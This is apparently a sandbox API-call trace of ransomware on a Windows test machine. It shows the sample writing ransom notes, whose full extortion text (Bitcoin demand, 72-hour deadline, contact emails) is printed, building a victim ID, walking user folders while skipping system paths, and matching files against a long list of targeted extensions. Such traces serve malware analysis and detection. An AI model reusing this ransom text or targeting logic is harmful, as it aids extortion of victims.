	[0198.553] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0198.556] CloseHandle (hObject=0x380) returned 1
	[0198.586] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0198.586] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0198.586] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0198.587] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0198.588] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Recent\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\recent\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0198.588] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0198.588] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0198.588] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0198.589] CloseHandle (hObject=0x380) returned 1
	[0198.589] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0198.589] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0198.589] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0198.589] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Recent\\HELP_DECRYPT_YOUR_FILES.HTML") returned 57
	[0198.589] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Recent\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\recent\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0198.590] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0198.590] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0198.593] CloseHandle (hObject=0x380) returned 1
	[0198.593] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0198.594] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0198.594] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0198.594] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0198.600] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0198.601] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Recent\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\recent\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0198.601] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0198.601] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0198.601] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0198.601] CloseHandle (hObject=0x380) returned 1
	[0198.602] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Recent\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\recent\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ea9dc84, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8ea9dc84, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8ea9dc84, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x1480, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_e-nmmcft1rdu.png.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="_E-NMM~1.SCL")) returned 0xffffffff
	[0198.602] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0198.602] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43754b80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43754b80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1
	[0198.602] lstrcmpW (lpString1="Saved Games", lpString2="..") returned 1
	[0198.602] lstrcmpW (lpString1="Saved Games", lpString2=".") returned 1
	[0198.602] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\RDhJ0CNFevzX" | out: lpString1="C:\\Users\\RDhJ0CNFevzX") returned="C:\\Users\\RDhJ0CNFevzX"
	[0198.602] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\") returned="C:\\Users\\RDhJ0CNFevzX\\"
	[0198.602] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\", lpString2="Saved Games" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Saved Games") returned="C:\\Users\\RDhJ0CNFevzX\\Saved Games"
	[0198.602] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Saved Games" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Saved Games") returned="C:\\Users\\RDhJ0CNFevzX\\Saved Games"
	[0198.603] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Saved Games", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\") returned="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\"
	[0198.603] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\") returned="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\"
	[0198.603] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\*.*"
	[0198.603] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\saved games\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43754b80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43754b80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0198.603] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\*.*") returned 37
	[0198.603] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0198.604] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\*.*", cchLength=0x25 | out: lpsz="c:\\users\\rdhj0cnfevzx\\saved games\\*.*") returned 0x25
	[0198.604] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.604] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\saved games\\*.*", lpSrch="windows") returned 0x0
	[0198.604] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.604] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\saved games\\*.*", lpSrch="boot") returned 0x0
	[0198.604] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.604] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\saved games\\*.*", lpSrch="system volume information") returned 0x0
	[0198.604] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.605] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\saved games\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0198.605] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.605] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\saved games\\*.*", lpSrch="temp") returned 0x0
	[0198.605] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.605] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\saved games\\*.*", lpSrch="program files") returned 0x0
	[0198.605] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.605] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\saved games\\*.*", lpSrch="program files (x86)") returned 0x0
	[0198.605] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.606] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\saved games\\*.*", lpSrch="appdata") returned 0x0
	[0198.606] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.606] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\saved games\\*.*", lpSrch="application data") returned 0x0
	[0198.606] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.606] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\saved games\\*.*", lpSrch="winnt") returned 0x0
	[0198.606] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.606] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\saved games\\*.*", lpSrch="tmp") returned 0x0
	[0198.606] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.607] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\saved games\\*.*", lpSrch="cache") returned 0x0
	[0198.607] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.607] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\saved games\\*.*", lpSrch="temporary internet files") returned 0x0
	[0198.607] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.607] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\saved games\\*.*", lpSrch="webcache") returned 0x0
	[0198.607] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.607] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\saved games\\*.*", lpSrch="inetcache") returned 0x0
	[0198.607] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.607] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\saved games\\*.*", lpSrch="nvidia") returned 0x0
	[0198.608] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.608] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\saved games\\*.*", lpSrch="packages") returned 0x0
	[0198.608] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.608] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\saved games\\*.*", lpSrch="cookies") returned 0x0
	[0198.608] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.608] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\saved games\\*.*", lpSrch="programdata") returned 0x0
	[0198.608] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43754b80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43754b80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0198.608] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x43754b80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43754b80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43754b80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0198.609] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1
	[0198.609] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1
	[0198.609] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\") returned="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\"
	[0198.609] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\desktop.ini") returned="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\desktop.ini"
	[0198.609] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\desktop.ini") returned 45
	[0198.609] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0198.609] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\desktop.ini", cchLength=0x2d | out: lpsz="c:\\users\\rdhj0cnfevzx\\saved games\\desktop.ini") returned 0x2d
	[0198.609] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.609] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\saved games\\desktop.ini", lpSrch="help_decrypt_your_files") returned 0x0
	[0198.610] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\saved games\\desktop.ini" | out: lpString1="c:\\users\\rdhj0cnfevzx\\saved games\\desktop.ini") returned="c:\\users\\rdhj0cnfevzx\\saved games\\desktop.ini"
	[0198.610] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\saved games\\desktop.ini") returned 45
	[0198.610] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0198.610] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.610] StrStrW (lpFirst=".ini", lpSrch=".") returned=".ini"
	[0198.610] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.644] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ini") returned 0x0
	[0198.644] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x43754b80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43754b80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43754b80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0
	[0198.644] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0198.645] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0198.645] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Saved Games" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Saved Games") returned="C:\\Users\\RDhJ0CNFevzX\\Saved Games"
	[0198.645] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Saved Games", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\*.*"
	[0198.645] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
